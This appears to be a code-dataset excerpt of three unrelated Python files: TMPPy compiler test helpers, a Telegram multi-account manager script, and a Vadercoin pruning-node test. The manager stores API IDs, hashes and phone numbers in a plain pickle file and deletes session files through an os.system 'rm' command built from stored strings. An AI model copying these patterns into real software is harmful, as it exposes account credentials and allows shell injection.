expected_error_regex = expected_error_regex.replace(' ', '')
def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
for line in normalized_error_message_lines:
if re.search(expected_error_regex, line):
return
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain that.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cxx_source}
''').format(expected_error = expected_error_regex,
compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_compile_error(
expected_py2tmp_error_regex,
expected_py2tmp_error_desc_regex,
tmppy_source,
module_ir2,
module_ir1,
cxx_source):
"""
Tests that the given source produces the expected error during compilation.
:param expected_py2tmp_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param expected_py2tmp_error_desc_regex: A regex used to match the _py2tmp error description,
e.g. 'No explicit binding was found for C, and C is an abstract class'.
:param source_code: The C++ source code. This will be dedented.
:param ignore_deprecation_warnings: A boolean. If True, deprecation warnings will be ignored.
"""
if '\n' in expected_py2tmp_error_regex:
raise Exception('expected_py2tmp_error_regex should not contain newlines')
if '\n' in expected_py2tmp_error_desc_regex:
raise Exception('expected_py2tmp_error_desc_regex should not contain newlines')
expected_py2tmp_error_regex = expected_py2tmp_error_regex.replace(' ', '')
def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
for line_number, line in enumerate(normalized_error_message_lines):
match = re.search('tmppy::impl::(.*Error<.*>)', line)
if match:
actual_py2tmp_error_line_number = line_number
actual_py2tmp_error = match.groups()[0]
if config.CXX_COMPILER_NAME == 'MSVC':
# MSVC errors are of the form:
#
# C:\Path\To\header\foo.h(59): note: see reference to class template instantiation 'tmppy::impl::MyError<X, Y>' being compiled
# with
# [
# X=int,
# Y=double
# ]
#
# So we need to parse the following few lines and use them to replace the placeholder types in the tmppy error type.
try:
replacement_lines = []
if normalized_error_message_lines[line_number + 1].strip() == 'with':
for line in itertools.islice(normalized_error_message_lines, line_number + 3, None):
line = line.strip()
if line == ']':
break
if line.endswith(','):
line = line[:-1]
replacement_lines.append(line)
for replacement_line in replacement_lines:
match = re.search('([A-Za-z0-9_-]*)=(.*)', replacement_line)
if not match:
raise Exception('Failed to parse replacement line: %s' % replacement_line) from e
(type_variable, type_expression) = match.groups()
actual_py2tmp_error = re.sub(r'\b' + type_variable + r'\b', type_expression, actual_py2tmp_error)
except Exception:
raise Exception('Failed to parse MSVC template type arguments')
break
else:
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain user-facing _py2tmp errors.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(expected_error = expected_py2tmp_error_regex,
compiler_command = e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
for line_number, line in enumerate(error_message_lines):
match = re.search(py2tmp_error_message_extraction_regex, line)
if match:
actual_static_assert_error_line_number = line_number
actual_static_assert_error = match.groups()[0]
break
else:
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain static_assert errors.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(expected_error = expected_py2tmp_error_regex,
compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
try:
regex_search_result = re.search(expected_py2tmp_error_regex, actual_py2tmp_error)
except Exception as e:
raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_regex) from e
if not regex_search_result:
pytest.fail(
textwrap.dedent('''\
The compilation failed as expected, but with a different error type.
Expected _py2tmp error type: {expected_py2tmp_error_regex}
Error type was: {actual_py2tmp_error}
Expected static assert error: {expected_py2tmp_error_desc_regex}
Static assert was: {actual_static_assert_error}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
actual_py2tmp_error = actual_py2tmp_error,
expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
actual_static_assert_error = actual_static_assert_error,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
try:
regex_search_result = re.search(expected_py2tmp_error_desc_regex, actual_static_assert_error)
except Exception as e:
raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_desc_regex) from e
if not regex_search_result:
pytest.fail(
textwrap.dedent('''\
The compilation failed as expected, but with a different error message.
Expected _py2tmp error type: {expected_py2tmp_error_regex}
Error type was: {actual_py2tmp_error}
Expected static assert error: {expected_py2tmp_error_desc_regex}
Static assert was: {actual_static_assert_error}
Error message:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
actual_py2tmp_error = actual_py2tmp_error,
expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
actual_static_assert_error = actual_static_assert_error,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
# 6 is just a constant that works for both g++ (<=6.0.0 at least) and clang++ (<=4.0.0 at least).
# It might need to be changed.
if actual_py2tmp_error_line_number > 6 or actual_static_assert_error_line_number > 6:
pytest.fail(
textwrap.dedent('''\
The compilation failed with the expected message, but the error message contained too many lines before the relevant ones.
The error type was reported on line {actual_py2tmp_error_line_number} of the message (should be <=6).
The static assert was reported on line {actual_static_assert_error_line_number} of the message (should be <=6).
Error message:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(actual_py2tmp_error_line_number = actual_py2tmp_error_line_number,
actual_static_assert_error_line_number = actual_static_assert_error_line_number,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
for line in error_message_lines[:max(actual_py2tmp_error_line_number, actual_static_assert_error_line_number)]:
if re.search('tmppy::impl', line):
pytest.fail(
'The compilation failed with the expected message, but the error message contained some metaprogramming types in the output (besides Error). Error message:\n%s' + error_message_head,
pytrace=False)
expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, cxx_source):
"""
Tests that the given source compiles and runs successfully.
:param source_code: The C++ source code. This will be dedented.
"""
if 'main(' not in cxx_source:
cxx_source += textwrap.dedent('''
int main() {
}
''')
source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
executable_suffix = {'posix': '', 'nt': '.exe'}[os.name]
output_file_name = _create_temporary_file('', executable_suffix)
e = None
try:
compiler.compile_and_link(
source=source_file_name,
include_dirs=[config.MPYL_INCLUDE_DIR],
output_file_name=output_file_name,
args=[])
except CommandFailedException as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The generated C++ source did not compile.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cxx_source}
''').format(compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = _cap_to_lines(e.stderr, 40)),
pytrace=False)
try:
run_compiled_executable(output_file_name)
except CommandFailedException as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The generated C++ executable did not run successfully.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
C++ source:
{cxx_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
cxx_source = add_line_numbers(cxx_source),
error_message = _cap_to_lines(e.stderr, 40)),
pytrace=False)
# Note that we don't delete the temporary files if the test failed. This is intentional, keeping them around helps debugging the failure.
try_remove_temporary_file(source_file_name)
try_remove_temporary_file(output_file_name)
def _get_function_body(f):
source_code, _ = inspect.getsourcelines(f)
# Skip the annotation and the line where the function is defined.
expected_line = 'def %s():\n' % f.__name__
while source_code[0] != expected_line:
source_code = source_code[1:]
source_code = source_code[1:]
# The body of some tests is a multiline string because they would otherwise cause the pytest test file to fail
# parsing.
if source_code[0].strip() == '\'\'\'' and source_code[-1].strip() == '\'\'\'':
source_code = source_code[1:-1]
return textwrap.dedent(''.join(source_code))
def create_identifier_generator():
def identifier_generator_fun():
for i in itertools.count():
yield 'TmppyInternal_%s' % i
return iter(identifier_generator_fun())
def _convert_tmppy_source_to_ir(python_source, identifier_generator):
filename='<unknown>'
source_ast = ast.parse(python_source, filename)
module_ir3 = ast_to_ir3.module_ast_to_ir3(source_ast, filename, python_source.splitlines())
module_ir3 = optimize_ir3.optimize_module(module_ir3)
module_ir2 = ir3_to_ir2.module_to_ir2(module_ir3, identifier_generator)
module_ir1 = ir2_to_ir1.module_to_ir1(module_ir2)
return module_ir2, module_ir1
def _convert_to_cpp_expecting_success(tmppy_source):
identifier_generator = create_identifier_generator()
try:
module_ir2, module_ir1 = _convert_tmppy_source_to_ir(tmppy_source, identifier_generator)
e = None
except ast_to_ir3.CompilationError as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The conversion from TMPPy to C++ failed.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
error_message = e.args[0]),
pytrace=False)
try:
header = ir1_to_ir0.module_to_ir0(module_ir1, identifier_generator)
header = optimize_ir0.optimize_header(header, identifier_generator, verbose=False)
cpp_source = ir0_to_cpp.header_to_cpp(header, identifier_generator)
cpp_source = utils.clang_format(cpp_source)
return module_ir2, module_ir1, cpp_source
except ast_to_ir3.CompilationError as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The conversion from TMPPy to C++ failed.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
error_message=e.args[0]),
pytrace=False)
def assert_compilation_succeeds(extra_cpp_prelude=''):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, extra_cpp_prelude + cpp_source)
return wrapper
return eval
def assert_code_optimizes_to(expected_cpp_source: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
assert expected_cpp_source[0] == '\n'
if cpp_source != expected_cpp_source[1:]:
pytest.fail(
textwrap.dedent('''\
The generated code didn't match the expected code.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
Generated C++ source:
{cpp_source}
Expected C++ source:
{expected_cpp_source}
Diff:
{cpp_source_diff}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=str(cpp_source),
expected_cpp_source=str(expected_cpp_source[1:]),
cpp_source_diff=''.join(difflib.unified_diff(expected_cpp_source[1:].splitlines(True),
cpp_source.splitlines(True),
fromfile='expected.h',
tofile='actual.h'))),
pytrace=False)
return wrapper
return eval
def assert_compilation_fails(expected_py2tmp_error_regex: str, expected_py2tmp_error_desc_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_compile_error(
expected_py2tmp_error_regex,
expected_py2tmp_error_desc_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
# TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_generic_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_generic_compile_error(
expected_error_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
# TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_static_assert_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
expect_cpp_code_generic_compile_error(
r'(error: static assertion failed: |error: static_assert failed .)' + expected_error_regex,
tmppy_source,
module_ir2,
module_ir1,
cpp_source)
return wrapper
return eval
def _split_list(l, num_elems_in_chunk):
args = [iter(l)] * num_elems_in_chunk
return list(itertools.zip_longest(*args))
def _get_line_from_diagnostic(diagnostic):
matches = re.match('<unknown>:([0-9]*):', diagnostic)
return int(matches.group(1))
def assert_conversion_fails(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
actual_source_lines = []
expected_error_regex = None
expected_error_line = None
expected_note_by_line = dict()
for line_index, line in enumerate(tmppy_source.splitlines()):
error_regex_marker = ' # error: '
note_regex_marker = ' # note: '
if error_regex_marker in line:
if expected_error_regex:
pytest.fail('Multiple expected errors in the same test are not supported', pytrace=False)
[line, expected_error_regex] = line.split(error_regex_marker)
expected_error_line = line_index + 1
elif note_regex_marker in line:
[line, expected_note_regex] = line.split(note_regex_marker)
expected_note_by_line[line_index + 1] = expected_note_regex
actual_source_lines.append(line)
if not expected_error_regex:
pytest.fail(
textwrap.dedent('''\
assert_conversion_fails was used, but no expected error regex was found.
TMPPy source:
{tmppy_source}
''').format(tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
try:
module_ir2, module_ir1 = _convert_tmppy_source_to_ir('\n'.join(actual_source_lines), create_identifier_generator())
e = None
except ast_to_ir3.CompilationError as e1:
e = e1
if not e:
pytest.fail(
textwrap.dedent('''\
Expected an exception, but the _py2tmp conversion completed successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1)),
pytrace=False)
# py2tmp diagnostics take up 3 lines each, e.g.:
# <unknown>:2:11: error: Empty lists are not currently supported.
# return []
# ^
py2tmp_diagnostics = _split_list(e.args[0].splitlines(), num_elems_in_chunk=3)
error_diagnostic = py2tmp_diagnostics[0]
expected_error_regex = '<unknown>:[0-9]*:[0-9]*: error: ' + expected_error_regex
if not re.match(expected_error_regex, error_diagnostic[0]):
pytest.fail(
textwrap.dedent('''\
An exception was thrown, but it didn\'t match the expected error regex.
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
''').format(expected_error_regex = expected_error_regex,
actual_error = '\n'.join(error_diagnostic),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
matches = re.match('<unknown>:([0-9]*):', error_diagnostic[0])
actual_error_line = int(matches.group(1))
if expected_error_line != actual_error_line:
pytest.fail(
textwrap.dedent('''\
An exception matching the expected regex was thrown, but the error mentioned the wrong line: {actual_error_line} was reported instead of {expected_error_line}
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
''').format(actual_error_line=actual_error_line,
expected_error_line=expected_error_line,
expected_error_regex = expected_error_regex,
actual_error = '\n'.join(error_diagnostic),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
actual_note_by_line = {_get_line_from_diagnostic(note[0]): note
for note in py2tmp_diagnostics[1:]}
for expected_note_line, expected_note_regex in expected_note_by_line.items():
actual_note = actual_note_by_line.get(expected_note_line)
if not actual_note:
raise Exception('Expected the note %s on line %s but no note was emitted mentioning this line. Emitted notes: %s' % (
expected_note_regex, expected_note_line, json.dumps(actual_note_by_line, indent=4)))
expected_note_regex = '<unknown>:[0-9]*:[0-9]*: note: ' + expected_note_regex
if not re.match(expected_note_regex, actual_note[0]):
pytest.fail(
textwrap.dedent('''\
A note diagnostic was emitted, but it didn\'t match the expected note regex.
Expected note regex: {expected_note_regex}
Actual note:
{actual_note}
TMPPy source:
{tmppy_source}
''').format(expected_note_regex = expected_note_regex,
actual_note = '\n'.join(actual_note),
tmppy_source = add_line_numbers(tmppy_source)),
pytrace=False)
for actual_note_line, actual_note in actual_note_by_line.items():
expected_note = expected_note_by_line.get(actual_note_line)
if not expected_note:
pytest.fail(
textwrap.dedent('''\
Unexpected note:
{actual_note}
TMPPy source:
{tmppy_source}
''').format(actual_note = '\n'.join(actual_note),
tmppy_source = add_line_numbers(tmppy_source),
pytrace=False))
return wrapper
def assert_conversion_fails_with_codegen_error(expected_error_regex: str):
def eval(f):
@wraps(f)
def wrapper():
tmppy_source = _get_function_body(f)
try:
module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
e = None
except ir0.CodegenError as e1:
e = e1
if not e:
pytest.fail(
textwrap.dedent('''\
Expected a codegen error, but the _py2tmp conversion completed successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir2}
C++ source:
{cpp_source}
''').format(tmppy_source=add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=add_line_numbers(cpp_source)),
pytrace=False)
if not re.match(expected_error_regex, e.args[0]):
pytest.fail(
textwrap.dedent('''\
A codegen error was emitted as expected, but it didn\'t match the expected note regex.
Expected error regex: {expected_error_regex}
Actual error:
{actual_error}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cpp_source}
''').format(expected_error_regex = expected_error_regex,
actual_error = e.args[0],
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cpp_source=add_line_numbers(cpp_source)),
pytrace=False)
return wrapper
return eval
# Note: this is not the main function of this file, it's meant to be used as main function from test_*.py files.
def main(file):
code = pytest.main(args = sys.argv + [os.path.realpath(file)])
exit(code)
| _py2tmp/testing/utils.py | 41,449 | Tests that the given source produces the expected error during compilation.
:param expected_py2tmp_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param expected_py2tmp_error_desc_regex: A regex used to match the _py2tmp error description,
e.g. 'No explicit binding was found for C, and C is an abstract class'.
:param source_code: The C++ source code. This will be dedented.
:param ignore_deprecation_warnings: A boolean. If True, deprecation warnings will be ignored.
Tests that the given source produces the expected error during compilation.
:param expected_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param cxx_source: The second part of the source code. This will be dedented.
Tests that the given source compiles and runs successfully.
:param source_code: The C++ source code. This will be dedented.
!/usr/bin/env python3 Copyright 2017 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Note that we use stdout here, unlike above. MSVC reports compilation warnings and errors on stdout. When running tests on Windows using Appveyor, the remove command fails for temporary files sometimes. This shouldn't cause the tests to fail, so we ignore the exception and go ahead. Different compilers output a different number of spaces when pretty-printing types. When using libc++, sometimes std::foo identifiers are reported as std::__1::foo. MSVC errors are of the form: C:\Path\To\header\foo.h(59): note: see reference to class template instantiation 'tmppy::impl::MyError<X, Y>' being compiled with [ X=int, Y=double ] So we need to parse the following few lines and use them to replace the placeholder types in the tmppy error type. 6 is just a constant that works for both g++ (<=6.0.0 at least) and clang++ (<=4.0.0 at least). It might need to be changed. Note that we don't delete the temporary files if the test failed. This is intentional, keeping them around helps debugging the failure. Skip the annotation and the line where the function is defined. The body of some tests is a multiline string because they would otherwise cause the pytest test file to fail parsing. TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test). TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test). py2tmp diagnostics take up 3 lines each, e.g.: <unknown>:2:11: error: Empty lists are not currently supported. return [] ^ Note: this is not the main function of this file, it's meant to be used as main function from test_*.py files. | 3,257 | en | 0.823391 |
import requests
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, pyfiglet
from colorama import init, Fore
import os, random
from time import sleep
init()
lg = Fore.LIGHTGREEN_EX
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
r = Fore.RED
n = Fore.RESET
colors = [lg, r, w, cy, ye]
def banner():
f = pyfiglet.Figlet(font='slant')
banner = f.renderText('Telegram')
print(f'{random.choice(colors)}{banner}{n}')
print(r+' Version: 1 | Author: Shabani'+n+'\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
#print(r)
banner()
#print(n)
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] List out all the accounts'+n)
print(lg+'[4] Delete specific accounts'+n)
#print(lg+'[5] Update your Genisys'+n)
print(lg+'[5] Quit')
a = int(input(f'\nEnter your choice: {r}'))
if a == 1:
with open('vars.txt', 'ab') as g:
newly_added = []
while True:
a = int(input(f'\n{lg}Enter API ID: {r}'))
b = str(input(f'{lg}Enter API Hash: {r}'))
c = str(input(f'{lg}Enter Phone Number: {r}'))
p = ''.join(c.split())
pickle.dump([a, b, p], g)
newly_added.append([a, b, p])
ab = input(f'\nDo you want to add more accounts?[y/n]: ')
if 'y' in ab:
pass
else:
print('\n'+lg+'[i] Saved all accounts in vars.txt'+n)
g.close()
sleep(3)
clr()
print(lg + '[*] Logging in from new accounts...\n')
for added in newly_added:
c = TelegramClient(f'sessions/{added[2]}', added[0], added[1])
try:
c.start()
print(f'n\n{lg}[+] Logged in - {added[2]}')
c.disconnect()
except PhoneNumberBannedError:
print(f'{r}[!] {added[2]} is banned! Filter it using option 2')
continue
print('\n')
input(f'\n{lg}Press enter to goto main menu...')
break
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
api_id = int(account[0])
api_hash = str(account[1])
phone = str(account[2])
client = TelegramClient(f'sessions\\{phone}', api_id, api_hash)
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
client.sign_in(phone, input('[+] Enter the code: '))
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Id = a[0]
Hash = a[1]
Phone = a[2]
pickle.dump([Id, Hash, Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu')
elif a == 3:
display = []
j = open('vars.txt', 'rb')
while True:
try:
display.append(pickle.load(j))
except EOFError:
break
j.close()
print(f'\n{lg}')
print(f'API ID | API Hash | Phone')
print(f'==========================================================')
i = 0
for z in display:
print(f'{z[0]} | {z[1]} | {z[2]}')
i += 1
print(f'==========================================================')
input('\nPress enter to goto main menu')
elif a == 4:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[2]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][2])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'{lg}Press enter to goto main menu{n}')
f.close()
elif a == 5:
clr()
banner()
quit() | manager.py | 5,753 | print(r)print(n)print(lg+'[5] Update your Genisys'+n) | 53 | en | 0.213274 |
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, MSG_BLOCK, msg_getdata, msg_verack, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.p2p import P2PInterface
from test_framework.test_framework import VadercoinTestFramework
from test_framework.util import (
assert_equal,
)
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
self.wait_until(test_function, timeout=timeout)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(MSG_BLOCK, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(VadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
self.disconnect_nodes(0, 1)
self.disconnect_nodes(0, 2)
self.disconnect_nodes(1, 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
self.connect_nodes(0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
self.sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, expected_services)
self.nodes[0].disconnect_p2ps()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
self.connect_nodes(0, 2)
try:
self.sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
self.connect_nodes(1, 2)
# sync must be possible
self.sync_blocks()
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
self.connect_nodes(0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
self.sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| test/functional/p2p_node_network_limited.py | 4,627 | Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that.
